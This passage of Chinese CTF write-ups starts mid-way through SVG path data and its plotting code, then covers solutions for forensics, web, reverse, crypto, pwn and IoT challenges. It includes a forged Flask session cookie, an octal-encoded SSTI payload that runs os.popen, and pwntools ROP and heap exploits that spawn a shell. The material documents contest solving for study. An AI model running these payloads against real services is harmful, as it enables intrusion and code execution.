1.71703,-0.49745 2.28937,-0.49745c1.71703,0 2.86172,0 3.43406,0c0.57234,0 1.73233,0.11429 2.28937,0c1.24561,-0.25556 1.71707,-0.99491 1.71707,-0.99491c1.14469,0 2.28937,0 3.43406,0c0,0 1.18828,0.19037 1.71703,0c0.74778,-0.26922 1.71703,-0.49746 2.28937,-0.49746c1.14469,0 1.71703,-0.49745 2.86172,-0.49745c1.14469,0 2.11394,-0.22823 2.86172,-0.49745c1.05756,-0.38073 1.71703,0 3.43406,0c1.14469,0 2.28937,0 2.86172,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 1.14469,0 2.28937,0c0,0 0.57234,0 1.14469,0c0.57234,0 1.14469,0 2.28937,0c0,0 0.57234,0 1.14469,0c0.57234,0 1.14469,0 1.14469,0c1.14469,0 1.71703,0 2.86172,0c0.57234,0 1.14469,0 1.71703,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 1.14469,0 2.28937,0c1.14469,0 1.71703,0 2.28937,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 1.14469,0 1.71703,0c0.57234,0 0.57234,0 1.71703,0c0.57234,0 1.71703,0 2.28937,0c0,0 0.73995,-0.35175 1.14469,0c0.40473,0.35175 0,0.99491 0,1.49237c0,1.49236 0,1.98982 0,2.98473c0,1.49237 -0.4644,2.55426 -1.71703,3.97964c-1.09858,1.25015 -0.24062,2.52996 -0.57234,3.48219c-0.59798,1.71664 -0.61866,2.5405 -1.14469,4.47709c-0.29407,1.08259 -1.14469,2.98473 -1.14469,3.97964c0,1.98982 0.43296,3.51809 0,5.472c-0.58289,2.63054 -1.71703,3.48219 -1.71703,5.47201c0,0.99491 -0.57234,2.48727 -0.57234,3.48218c0,1.98982 0.52602,2.54051 0,4.4771c-0.29407,1.08259 -0.88171,2.01643 -1.14469,2.98473c-0.29407,1.08259 -1.14469,3.97964 -1.14469,4.97455c0,0.99491 0,2.98473 0,3.48218c0,1.49236 -0.85474,2.92432 -1.14469,4.4771c-0.09166,0.49103 0,1.98982 0,2.98473c0,0.99491 0.13149,2.50059 0,2.98474c-0.29407,1.08259 -0.29728,2.00909 -0.57234,3.48218c-0.28994,1.55278 0.08475,2.10342 -0.57234,3.48218c-0.30972,0.64996 -0.85474,1.43196 -1.14469,2.98474c-0.09166,0.49103 -0.27828,1.90214 -0.57234,2.98473c-0.26298,0.9683 0.13149,2.50059 0,2.98474c-0.29407,1.08259 -0.57234,1.98982 -0.57234,1.98982c0,0.99491 0,1.49236 0,2.98473c0,0 0,0.99491 0,1.49236c0,1.49237 0.21903,2.0277 0,2.48728c-0.30972,0.64996 -0.57234,0.99491 -0.57234,0.99491c0,0.99491 0,1.98982 0,2.48727c0,0.49745 0,0.49745 0,1.49236c0,0.49745 0,0.99492 0,0.99492c0,0.49745 0,0.99491 0,0.99491c0,0.99491 -0.57234,0.99491 -0.57234,0.99491c-1.14469,0 -4.57875,0 -6.86812,0c-2.86172,0 -6.86812,0 -9.15749,0c-2.86172,0 -6.29578,0 -8.58515,0c-2.86172,0 -5.15109,0 -7.44046,0c-2.28937,0 -3.43406,0 -5.72347,0c-1.14469,0 -2.28937,0 -4.0064,0c-0.57234,0 -2.28937,0 -3.43406,0c-0.57234,0 -1.71703,0 -2.86172,0c-1.14469,0 -3.43406,0 -4.57875,0c-1.14469,0 -3.43406,0 -4.57878,0c-1.14469,0 -3.43406,0 -4.57875,0c-1.14469,0 -2.86172,0 -4.57875,0c0,0 -1.71703,0.49745 -2.28937,0.49745c-1.14469,0 -2.28937,0 -4.0064,0c-0.57234,0 -2.30467,0.38316 -2.86172,0.49745c-1.24557,0.25557 -2.28937,0.99491 -3.43406,0.99491c-0.57234,0 -1.71703,0 -2.28937,0c-0.57234,0 -1.14469,0 -1.71703,0c-0.57234,0 -1.14469,0 -1.71703,0c-0.57234,0 -1.14469,0 -2.28937,0c-0.57234,0 -1.14469,0 -1.14469,0c-0.57234,0 -1.14469,0 -1.14469,0c-1.14469,0.49745 -1.71703,0.49745 -2.28937,0.49745c0,0 -0.57234,0 -1.14472,0c0,0 -1.14469,0.49745 -1.14469,0.49745c-0.57234,0 -0.96922,0.76668 -1.71703,0.49745c-0.52878,-0.19037 0,-1.49236 0,-1.98982c0,-0.99491 0,-2.48727 0,-3.48218c0,-0.99492 0,-1.98983 0,-2.98474c0,-0.49745 0,-1.98982 0,-1.98982c0,-0.99491 0,-1.49236 0,-2.98473c0,0 0,-0.49746 0,-2.98474c0,-0.49745 0.27831,-1.90214 0.57234,-2.98473c0.26301,-0.9683 0,-2.48728 0,-2.98474c0,-0.99491 0,-1.98982 0,-2.98473c0,-0.99491 0,-2.48727 0,-3.48218c0,-0.99492 0,-1.98983 0,-2.48728c0,-0.99491 0,-2.98473 0,-3.48218c0,-0.99491 0,-1.98982 0,-2.98474c0,-0.49745 0,-2.48727 0,-3.97964c0,-1.49236 0,-1.98982 0,-2.98473c0,-0.49746 0,-1.98983 0,-2.48728c0,-1.49236 0.52518,-1.68481 1.14469,-2.98473c0.43806,-0.91918 0,-1.98982 0,-2.98474c0,-1.49236 0.28243,-1.92941 0.57234,-3.48218c0.09166,-0.49103 0.57234,-0.49745 0.57234,-1.49236c0,-0.99491 0,-1.98982 0,-2.48728c0,-0.49745 1.14472,-2.48728 1.14472,-2.98473c0,-1.49236 0,-1.98982 0,-2.98473c0,-0.49745 0,-1.49236 0,-2.48727c0,-0.49745 0,-0.99491 0,-1.98982c0,-0.99491 0,-1.98982 0,-2.48727c0,-1.49237 0,-1.98982 0,-2.98473c0,-0.49745 0,-1.49237 0,-1.98982c0,-0.49745 0,-0.99491 0,-1.98982c0,-0.49745 0,-0.99491 0,-1.49237c0,-0.49745 0,-0.99491 0,-1.49236c0,-0.49745 0,-0.99491 0,-1.49236c0,-0.49745 0,-0.99491 0,-0.99491c0,-0.49745 0,-0.99491 0,-0.99491c0,-0.49745 0,-0.99491 0,-1.49236c0,-0.49745 0,-0.49745 0,-1.49237c0,0 0,-0.49746 0,-0.99491c0,-0.49745 0,-0.99491 0,-0.99491l0,-0.99491l-0.57234,-0.49745l0,-0.49745'], ['m1097.66841,53.66696c0,0 0,0.62695 0,1.88084c0,2.50777 0,6.26943 0,8.7772c0,3.76167 0,8.77721 0,11.285c0,3.13471 0,6.26943 0,10.65803c0,3.76167 0,5.6425 0,8.15027c0,1.25389 0,3.76167 0,5.64249c0,1.88083 0,3.76167 0,5.01556c0,1.25388 0,3.13471 0,4.3886c0,1.25389 0,2.50778 0,3.76168c0,0.62694 0,2.50777 0,3.76165c0,0.62694 0,2.50777 0,3.13471c0,1.88083 0,3.13472 0,4.38861c0,1.88083 0,3.76167 0,5.01555c0,1.25389 0,3.13472 0,4.38862c0,1.88082 0,3.13471 0,4.3886c0,1.25389 0,2.50778 0,3.76167c0,1.25389 0,2.50777 0,3.76167c0,1.25388 0,2.50777 0,3.76165c0,1.2539 0,1.2539 0,2.50778c0,1.25389 0,1.88083 0,2.50777c0,1.25388 0,1.88083 0,2.50777c0,1.25388 0,1.88083 0,3.13471c0,0.62695 0,1.25389 0,1.88083c0,0.62694 0,1.25389 0,1.88083c0,0.62694 0,0.62694 0,2.50777c0,0.62694 0,1.25388 0,1.88083c0,0 0,0.62694 0,1.25388c0,0 0.38497,0.51646 0.79167,1.88084c0.18191,0.61017 0.60594,0.72239 0,1.88082c-0.42844,0.81915 -0.79167,1.25389 -0.79167,1.25389c1.58334,0 1.58334,0 2.375,0c0.79167,0 0.79167,0 1.58334,0c0.79167,0 0.79167,0 1.58333,0c0.79167,0 3.16667,0 3.95834,0c1.58337,0 2.37502,0 3.1667,0c1.58334,0 2.375,0 3.95834,0c0.79166,0 0.79166,0 2.375,0c0,0 0.79167,0 1.58333,0c0.79167,0 1.58334,0 1.58334,0c0.79166,0 1.58333,0 2.375,0c0.79166,0 1.58333,0 2.375,0c0,0 0.79167,0 1.58333,0c0,0 0.79167,0 2.375,0c0.79167,0 2.37501,0 2.37501,0c0.79166,0 2.375,0 3.16668,0c0,0 1.58334,0 2.375,0c0.79167,0 0.79167,0 1.58334,0c0.79167,0 0.79167,0 2.375,0c0,0 1.58333,0 2.375,0c0.79167,0 2.375,0 3.16667,0c1.58333,0 2.375,0 2.375,0c1.58333,0 2.375,0 3.16667,0c0.79167,0 1.58333,0 1.58333,0c0.79167,0 2.375,0 3.16667,0c1.58334,0 1.58334,0 2.37502,0c1.58334,0 2.375,0 3.95834,0c0,0 0.79166,0 2.375,0c0.79167,0 2.375,0 2.375,0c0.79167,0 2.375,0 3.16667,0c0,0 2.375,0 3.95833,0c0.79167,0 2.37501,0 3.95834,0c1.58333,0 1.58333,0 2.375,0c0.79167,0 1.58334,0 2.37501,0c1.58333,0 2.375,0 3.16667,0c0.79166,0 1.58333,0 1.58333,0c0.79167,0 1.58335,0 2.37501,0c0.79167,0 1.58334,0 2.37501,0l0,0'], ['m819.66669,80c0,0 1.14602,0 1.14602,0c0,1.17493 0,2.34987 0,2.34987c0,2.34987 1.48169,3.86893 2.29203,4.69973c0.81034,0.8308 1.49351,2.07887 2.29203,3.5248c2.32806,4.21557 1.7654,5.93753 2.29203,8.22453c0.58875,2.55695 3.63642,6.87656 4.58406,8.22453c1.49834,2.13132 0.3561,3.61909 1.14602,7.0496c0.58875,2.55695 3.43805,4.69973 3.43805,5.87466c0,1.17493 0.19837,3.35177 1.14602,4.69973c1.49834,2.13132 1.93971,3.74334 3.43805,5.87466c0.94765,1.34797 3.43805,5.87466 3.43805,5.87466c1.14602,1.17493 0.70745,3.61424 1.14602,4.69973c1.24044,3.07025 2.29203,2.34987 2.29203,3.5248c0,1.17493 1.14602,2.34987 2.29203,3.5248c0,0 1.34439,1.00191 2.29203,2.34987c1.49834,2.13132 2.29203,2.34987 2.29203,3.5248c0,1.17493 1.14602,1.17493 1.14602,2.34987c0,1.17493 1.14602,1.17493 1.14602,1.17493c1.14602,1.17493 1.48169,3.86893 2.29203,4.69973c0.81034,0.8308 1.14602,1.17493 2.29203,2.34987c0,0 1.67181,-0.36019 2.29203,1.17493c0.43857,1.08549 0,1.17493 1.14602,1.17493c1.14602,0 2.62771,0.8308 3.43805,0c1.62068,-1.66161 1.14602,-3.5248 2.29203,-4.69973c0,0 2.62771,-1.51906 3.43805,-2.34987c0.81034,-0.8308 1.14602,-2.34987 1.14602,-2.34987c0,-1.17493 0.79369,-2.56841 2.29203,-4.69973c0.94765,-1.34796 1.48169,-2.69399 2.29203,-3.5248c0.81034,-0.8308 2.29203,-1.17493 2.29203,-1.17493c0,-1.17493 1.14602,-2.34987 3.43805,-4.69973c1.14602,-1.17493 0.54349,-2.52535 1.14602,-3.5248c1.34725,-2.23486 3.08572,-3.74334 4.58406,-5.87466c1.89529,-2.69593 2.29203,-4.69973 3.43805,-5.87466c3.43805,-3.5248 3.29787,-5.95221 4.58406,-8.22453c2.07394,-3.664 3.43805,-4.69973 4.58406,-7.0496c1.14602,-2.34987 -0.05897,-2.70082 1.14602,-4.69973c1.34725,-2.23486 3.34362,-1.62948 4.58406,-4.69973c0.87714,-2.17099 2.46319,-4.08203 3.43805,-4.69973c2.17984,-1.38121 1.34439,-3.35177 2.29203,-4.69973c1.49834,-2.13132 1.85346,-4.78916 2.29203,-5.87466c0.62022,-1.53513 1.23324,-3.07517 2.29203,-3.5248c1.49736,-0.63587 1.14602,-2.34987 1.14602,-2.34987l0,-1.17493l0,-1.17493'], ['m958.66669,166c1.22353,-4.35211 4.08349,-7.70326 6.11765,-11.60563c0.90966,-1.7452 2.67991,-4.18024 4.89412,-8.70423c1.37318,-2.80566 3.88238,-7.03988 4.89412,-8.70423c1.59968,-2.63157 2.18994,-5.91661 3.67059,-10.15493c1.04699,-2.99695 3.6157,-5.14878 4.89412,-10.15493c0.35457,-1.38846 1.22353,-5.80282 2.44706,-8.70423c1.22353,-2.90141 1.51059,-6.02368 2.44706,-8.70423c1.32435,-3.79088 1.58691,-6.69331 4.89412,-10.15493c2.05104,-2.1468 2.44706,-2.90141 2.44706,-2.90141c0,-1.4507 1.78489,-3.90738 2.44706,-5.80282c0.46823,-1.34028 0.7553,-3.01183 1.22353,-4.35211c0.66217,-1.89544 1.22353,-4.35211 1.22353,-5.80282c0,0 1.78489,0.44473 2.44706,-1.4507c0.46823,-1.34028 0,-1.4507 1.22353,-2.90141c1.22353,-1.4507 1.22353,-2.90141 1.22353,-2.90141c1.22353,0 2.44706,1.4507 2.44706,4.35211c0,1.4507 3.04202,5.54712 3.67059,8.70423c0.56225,2.82379 0.4129,3.35113 2.44706,7.25352c0.90966,1.7452 1.45115,3.90609 3.67059,5.80282c1.40373,1.19959 2.44706,4.35211 2.44706,4.35211c1.22353,2.90141 2.65885,5.58917 3.67059,7.25352c1.59968,2.63157 2.0709,4.62195 3.67059,7.25352c2.02348,3.3287 4.89412,5.80282 6.11765,8.70423c1.22353,2.90141 3.56977,3.46264 4.89412,7.25352c0.46816,1.34028 3.32072,6.1099 6.11757,10.15493c1.09702,1.5866 3.56977,2.01194 4.89412,5.80282c0.46823,1.34028 1.22353,2.90141 2.44706,4.35211c2.44706,2.90141 2.62972,3.58943 3.67059,4.35211c2.32728,1.7054 0.8473,3.17125 2.44706,5.80282c1.01174,1.66435 3.00849,2.45667 3.67059,4.35211c0.46823,1.34027 0,1.4507 1.22353,2.90141l0,1.4507']]
# 创建图表
fig, ax = plt.subplots()
ax.set_aspect('equal')

# 存储所有点的列表
all_x_points = []
all_y_points = []

# 遍历每个SVG路径
for path_str in svg_paths:
    # 解析SVG路径
    path_string = path_str[0]   
    path = parse_path(path_string)   
    # 存储当前路径的点
    current_x_points = []
    current_y_points = []

    # 遍历路径中的每个段落
    for segment in path:
        if isinstance(segment, Line):
            # 处理直线段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            current_x_points.append(segment.end.real)
            current_y_points.append(segment.end.imag)
        elif isinstance(segment, CubicBezier):
            # 处理三次贝塞尔曲线段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            for t in [0.0, 0.5, 1.0]:
                point = segment.point(t)
                current_x_points.append(point.real)
                current_y_points.append(point.imag)
        elif isinstance(segment, QuadraticBezier):
            # 处理二次贝塞尔曲线段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            for t in [0.0, 0.5, 1.0]:
                point = segment.point(t)
                current_x_points.append(point.real)
                current_y_points.append(point.imag)
        elif isinstance(segment, Arc):
            # 处理圆弧段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            for t in [0.0, 0.5, 1.0]:
                point = segment.point(t)
                current_x_points.append(point.real)
                current_y_points.append(point.imag)

    # 将当前路径的点添加到总列表中
    all_x_points.extend(current_x_points)
    all_y_points.extend(current_y_points)

    # 在每个子路径结束时插入NaN以断开线条
    all_x_points.append(float('nan'))
    all_y_points.append(float('nan'))

# 绘制路径
ax.plot(all_x_points, all_y_points)

# 设置坐标轴范围
x_min, x_max = min(all_x_points), max(all_x_points)
y_min, y_max = min(all_y_points), max(all_y_points)
ax.set_xlim(x_min - 10, x_max + 10)
ax.set_ylim(y_min - 10, y_max + 10)

# 设置图表标题和轴标签
plt.title('SVG-title')
plt.xlabel('X-axis')
plt.ylabel('Y-axis')

# 显示网格线
plt.grid()

# 显示图表
plt.show()

image

猪圈密码,但是画反了,上下反转一下

image

但是最后一个对不上,猜了一下是g,acadesvg

image

第四届“长城杯”网络安全大赛暨京津冀网络安全技能竞赛(初赛)部分WriteUp by Mini-Venom

image

MISC

BrickGame

签到题目

image

漏洞探踪,流量解密

提取IP

cat oa.access.log|awk '{print $1}'|uniq -c|sort -nr

IP:192.168.30.234​是阶段2密码

然后看POST请求,是通达OA的洞,后面有一个/raw​,还有一个/key​,有提示

image

是RC4加密,直接解密就好了

image

最安全的加密方式

image

$pass='25ming@'​,后面有压缩包,压缩了flag.txt

image

提取出来用上面的pass解密,然后拿到一个md5的表,爆破字符即可:

UNCTF2022-公开赛 | Lazzaro (lazzzaro.github.io)

from hashlib import md5

c = '''8fa14cdd754f91cc6554c9e71929cce7
2db95e8e1a9267b7a1188556b2013b33
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
f95b70fdc3088560732a5ac135644506
b9ece18c950afbfa6b0fdbfa4ff731d3
2510c39011c5be704182423e3a695e91
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
6f8f57715090da2632453988d9a1501b
cfcd208495d565ef66e7dff9f98764da
03c7c0ace395d80182db07ae2c30f034
e358efa489f58062f10dd7316b65649e
b14a7b8059d9c055954c92674ce60032
c81e728d9d4c2f636f067f89cc14862c
e1671797c52e15f763380b45e841ec32
4a8a08f09d37b73795649038408b5f33
4c614360da93c0a041b22e537de151eb
4b43b0aee35624cd95b910189b3dc231
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
e1671797c52e15f763380b45e841ec32
8d9c307cb7f3c4a32822a51922d1ceaa
4a8a08f09d37b73795649038408b5f33
4b43b0aee35624cd95b910189b3dc231
57cec4137b614c87cb4e24a3d003a3e0
83878c91171338902e0fe0fb97a8c47a
e358efa489f58062f10dd7316b65649e
865c0c0b4ab0e063e5caa3387c1a8741
d95679752134a2d9eb61dbd7b91c4bcc
7b8b965ad4bca0e41ab51de7b31363a1
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
cbb184dd8e05c9709e5dcaedaa0495cf'''.split('\n')

s = list(range(32,127))
t = {}

for k in s:
    t[md5(chr(k).encode()).hexdigest()] = chr(k)

flag=''
for k in c:
    flag += t[k]

print(flag)

WEB

SQLUP

有hint:

Hint:<!-- The developer likes to use fuzzy matching in the login module. -->

username: admin password: 1

登录,头像处上传.htaccess​和图片🐎,在/uploads/路径下,执行tac /flag即可

CandyShop

1.进去到环境后,爆破得出key是a123456

2.利用此key伪造admin身份访问admin目录

python .\flask_session_cookie_manager3.py decode -s "a123456" -c ".eJwNy8EKgCAMANB_2blDNE3tZ2JtMyQySD1E9O95ffBe4HLHtV6HZliAMUQevbcyErlp04h21iBCQSbrLKJBMuxggCSaa6pPX3vTUju1onemUzuRnCnD9wOMFB3q.Zt1QjQ.OTtQdF_Cpv1tSr2nRVze_HVtck8"

{'csrf_token': 'c39fc0885d0aa72bef356e9dda9d25753343a4c7', 'identity': 'guest', 'username': 'admin'}

3.利用链污染将全局变量sold污染为600

 python .\flask_session_cookie_manager3.py encode -s "a123456" -t "{'csrf_token': '94c60c3656b0b0e1f9875b5007a36bdb8c99a4c2', 'identity': 'admin', 'username': 'admin','__init__':{'__globals__':{'sold':600}}}"

.eJxNi0EKwyAQAP-y5x42TTTRz8iumiA1K0R7KMG_V-ilt5mBucHXa3etvKKABbN4jX7WSjMyxmk326pYIa40aw68eWNo8U94QApRWmqfcVE4k4z0rvESOuNfci5Jas6BvQcfuTDl-tNacgCrEXvvXwr9KtA.Zt1Rqw.ccWGXf3_b2qaTKmJKf1O7VZKJdg

4.然后得出flag路径

a

5.由于/admin/view_inventory目录是由render_template_string渲染有ssti漏洞

payload:

python .\flask_session_cookie_manager3.py encode -s "a123456" -t "{'csrf_token': '94c60c3656b0b0e1f9875b5007a36bdb8c99a4c2', 'identity': 'admin', 'username': 'admin','__init__':{'__globals__':
{'inventory':'{{7*7}}'}}}"

.eJxNjEEKwyAQRe8yy9KFbaLGXEYcNWVoMoKaQhHvXks33f3_4L0GvuTN1vSMDCuY2SvhJyUVChTxtplFS5RCaDcpDLh4Y9zs73AFCpEr1fewXDiIBzpLzOyO-IesJaZqLaxt7Mee0O3ld4lfo5Dyt9Cavujeoff-AQLkL0I.Zt1SVw.Y8voG3JvYxRwEznVxh_B1j2Pj4M

b

由于以上sanitize_inventory_sold函数对污染参数做了过滤,只能进行无参rce,转换为8进制进行命令执行

{{''.__class__().__bases__[0]['__subclasses__'][133]['__init__']['__globals__']['__builtins__']['eval']('__import__("os").popen("env").read()')}}

这是以上命令转换的8进制形式
{{\'\'[\'\\137\\137\\143\\154\\141\\163\\163\\137\\137\'][\'\\137\\137\\142\\141\\163\\145\\163\\137\\137\'][0][\'\\137\\137\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163\\137\\137\']()[133][\'\\137\\137\\151\\156\\151\\164\\137\\137\'][\'\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137\'][\'\\137\\137\\142\\165\\151\\154\\164\\151\\156\\163\\137\\137\'][\'\\145\\166\\141\\154\'](\'137\\137\\151\\155\\160\\157\\162\\164\\137\\137\\050\\042\\157\\163\\042\\051\\056\\160\\157\\160\\145\\156\\050\\042\\042\\051\\056\\162\\145\\141\\144\\050\\051')}}

利用find /tmp | grep flag​命令
找到flag所在目录
tac读取flag

REVERSE

easyre

64bit,没壳,直接ida打开分析,然后F5查看伪代码,找到main​函数,

int __fastcall main(int argc, const char **argv, const char **envp)
{
  const __m128i *v3; // rcx
  unsigned __int64 v4; // r8
  __int64 i; // r10
  __int64 v6; // rax

  if ( argc <= 1 )
    exit(0);
  v3 = (const __m128i *)argv[1];
  v4 = 1LL;
  for ( i = 0LL; i != 43; ++i )
  {
    v3->m128i_i8[i] ^= v3->m128i_u8[i + 1 + -42 * (v4 / 0x2A)];
    ++v4;
  }
  if ( _mm_movemask_epi8(
         _mm_and_si128(
           _mm_cmpeq_epi8(_mm_loadu_si128(v3), (__m128i)xmmword_140021410),
           _mm_cmpeq_epi8(_mm_loadu_si128(v3 + 1), (__m128i)xmmword_140021400))) == 0xFFFF )
  {
    v6 = sub_1400011A0(&qword_1400312E0, "flag is your input", v4, 0xC30C30C30C30C30DuLL);
    sub_1400015A0(v6);
  }
  return 0;
}

逻辑很清晰,就是一个异或,然后比对,去内存找到加密后的数据,

image

然后写脚本解密

#include <iostream>
#include <vector>

int main() {
    std::vector<unsigned char> encoded = { 0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03,
                                           0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02,
                                           0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57,
                                           0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04,
                                           0x4A, 0x77, 0x0D };
    std::vector<int> xorIndices;

    int stepCounter = 1;
    for (int i = 0; i < encoded.size(); i++) {
        int index = i + 1 - 42 * (stepCounter / 42);
        xorIndices.push_back(index);
        stepCounter++;
    }

    int currentIndex = encoded.size() - 1;
    for (int i = encoded.size() - 1; i >= 0; i--) {
        encoded[i] ^= encoded[xorIndices[currentIndex]];
        currentIndex--;
    }

    for (auto byte : encoded) {
        std::cout << byte;
    }
    std::cout << std::endl;

    return 0;
}
//flag{fcf94739-da66-467c-a77f-b50d12a67437}

CRYPTO

RandomRSA

普遍意义上来说,nextprime不会超出枚举范围,两层组合,复杂度上来看也依然可以尝试,

n的结构很简单的二元式子,flag也证明了只需爆破,一些格的做法这里似乎找不到合适的放缩,维度也较低,故而放弃

from Crypto.Util.number import *
from sympy.ntheory.residue_ntheory import nthroot_mod

p = 170302223332374952785269454020752010235000449292324018706323228421794605831609342383813680059406887437726391567716617403068082252456126724116360291722050578106527815908837796377811535800753042840119867579793401648981916062128752925574017615120362457848369672169913701701169754804744410516724429370808383640129
a = 95647398016998994323232737206171888899957187357027939982909965407086383339418183844601496450055752805846840966207033179756334909869395071918100649183599056695688702272113280126999439574017728476367307673524762493771576155949866442317616306832252931038932232342396406623324967479959770751756551238647385191314
b = 122891504335833588148026640678812283515533067572514249355105863367413556242876686249628488512479399795117688641973272470884323873621143234628351006002398994272892177228185516130875243250912554684234982558913267007466946601210297176541861279902930860851219732696973412096603548467720104727887907369470758901838
n = 5593134172275186875590245131682192688778392004699750710462210806902340747682378400226605648011816039948262008066066650657006955703136928662067931212033472838067050429624395919771757949640517085036958623280188133965150285410609475158882527926240531113060812228408346482328419754802280082212250908375099979058307437751229421708615341486221424596128137575042934928922615832987202762651904056934292682021963290271144473446994958975487980146329697970484311863524622696562094720833240915154181032649358743041246023013296745195478603299127094103448698060367648192905729866897074234681844252549934531893172709301411995941527
c = 2185680728108057860427602387168654320024588536620246138642042133525937248576850574716324994222027251548743663286125769988360677327713281974075574656905916643746842819251899233266706138267250441832133068661277187507427787343897863339824140927640373352305007520681800240743854093190786046280731148485148774188448658663250731076739737801267702682463265663725900621375689684459894544169879873344003810307496162858318574830487480360419897453892053456993436452783099460908947258094434884954726862549670168954554640433833484822078996925040310316609425805351183165668893199137911145057639657709936762866208635582348932189646
e = 65537

for k1 in range(1000):
    for k2 in range(1000):
        A = a
        B = b + k2 + k1 * a
        C = k1 * (b + k2) - n
        # Ax^2 + Bx + C - n = 0
        # 求根公式
        delta = nthroot_mod(B**2 - 4 * A * C,2,p)
        p1 = (-B + delta) * inverse(2 * A, p) % p + k1
        p2 = (-B - delta) * inverse(2 * A, p) % p + k1
        if n % p1 == 0:
            p = p1
            q = n // p
            d = inverse(e, (p - 1) * (q - 1))
            print(long_to_bytes(pow(c, d, n)))
        elif n % p2 == 0:
            p = p2
            q = n // p
            d = inverse(e, (p - 1) * (q - 1))
            print(long_to_bytes(pow(c, d, n)))


大约3h

b'flag{j1st_e_s1mp1e_b3ute}' ‍

PWN

FlowerShop

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process('./pwn')
elf=ELF('./pwn')
bin_sh=0x601840
pay=b'\x00'*52+b'pwn\x00'+b'\xff\xff\xff\xff'
p.send(pay)
p.sendline(b'a')
p.sendline(b'c')
p.sendline(str(1))
p.sendline(b'a')
p.sendline(str(1))
p.sendline(b'a')
p.sendline(str(1))
p.sendline(b'b')
rdi=0x0000000000400f13
payload=b'a'*0x18+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(0x400730)

p.send(payload)
p.sendline(str(1))

p.interactive()

Kylin_Heap

image

漏洞点位于free这个地方,由于没有清空指针造成的uaf,通过这个即可泄露地址和进行任意地址写,由于libc版本为2.31,所以劫持free_hook

from pwn import *
import json
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug')
p=remote("IP",PORT)
elf = ELF('./Heap')
libc = ELF('./libc-2.31-0kylin9.2k0.2.so')

def add(size,content):
        sla(b'What will you do, adventurer? ',b'1')
        sla(b'Enter the size of the block you wish to summon (1 to 1280 bytes): ',str(size))
        sla(b'bytes):\n',content)

def free(idx):
        sla(b'What will you do, adventurer? ',b'2')
        sla(b'index (0-19): ',str(idx))

def edit(idx,content):
        sla(b'What will you do, adventurer? ',b'3')
        sla(b'index (0-19): ',str(idx))
        sla(b'bytes):\n',content)

def show(idx):
        sla(b'What will you do, adventurer? ',b'4')    
        sla(b'index (0-19): ',str(idx))

add(0x460,b'a'*0x10)
add(0x20,b'a'*8)
free(0)
show(0)
p.recvline()
libc_base=u64(p.recv(6).ljust(8,b'\x00'))

free_hook=libc_base+0x2f48
malloc_hook=libc_base-0x70

for i in range(9):
        add(0x68,b'a'*1)
for i in range(9):
        free(i+1)
system=libc_base-0x1967d0
edit(9,p64(free_hook-0x10))
for i in range(7):
        add(0x68,b'a'*8)
add(0x68,b'/bin/sh\x00'*1)
add(0x68,b'/bin/sh\x00'*1)
edit(19,p64(system))
print(hex(libc_base))
free(18)
p.interactive()

2024中国工业互联网安全大赛智能家电行业赛道WriteUp by 图书馆五楼风很大

  1. 我要做k1✌和🍁✌的犬
  2. 第一次线下赛里AK CTF,被带飞了

IOT

BLE协议分析

image

有多的数据在流量包上,winhex查看:image

提取出来压缩包:image

压缩包被Link key加密了,找到key之后直接解密即可

image

固件恶意修改

直接binwalk,逆向libc.so,看到flag字符串拉出来异或0x13即可:

image

ICS

异常工控流量

image

发现有图片,筛选一下对话

image

发现每个会话中传输数据时会有26个字符的冗余数据,我们剔除一下

def remove_first_26_characters_from_file(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as infile, open(output_file, 'w', encoding='utf-8') as outfile:
        for line in infile:
            if len(line) > 26:
                outfile.write(line[26:])
            else:
                outfile.write("\n")

input_file = '1.txt'
output_file = '2.txt'
remove_first_26_characters_from_file(input_file, output_file)

删除换行后保存,但其实这个里面有5张图片,

image所以我们还要foremost处理一下:

image

UDP协议分析

image

image

IEC104规约

看到ASCII码,直接手撕即可:

image

Crypto

RSA基础

共模攻击,exp:

